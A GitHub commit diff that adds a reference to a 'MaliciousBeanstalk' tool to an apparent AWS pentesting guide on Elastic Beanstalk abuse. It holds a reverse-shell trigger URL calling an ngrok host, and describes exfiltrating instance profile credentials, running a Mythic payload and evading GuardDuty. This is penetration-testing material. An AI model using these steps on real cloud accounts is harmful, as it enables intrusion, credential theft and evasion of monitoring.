Skip to content

Commit

Permalink
Add malicious beanstalk reference
Browse files Browse the repository at this point in the history
  • Loading branch information
fr4nk3nst1ner committed May 27, 2024
1 parent 1528a49 commit 28592ba
Showing 1 changed file with 4 additions and 0 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -194,6 +194,10 @@ aws elasticbeanstalk update-environment --environment-name MyEnv --version-label

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).

The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
```
{% endcode %}

Expand Down

0 comments on commit 28592ba

Please sign in to comment.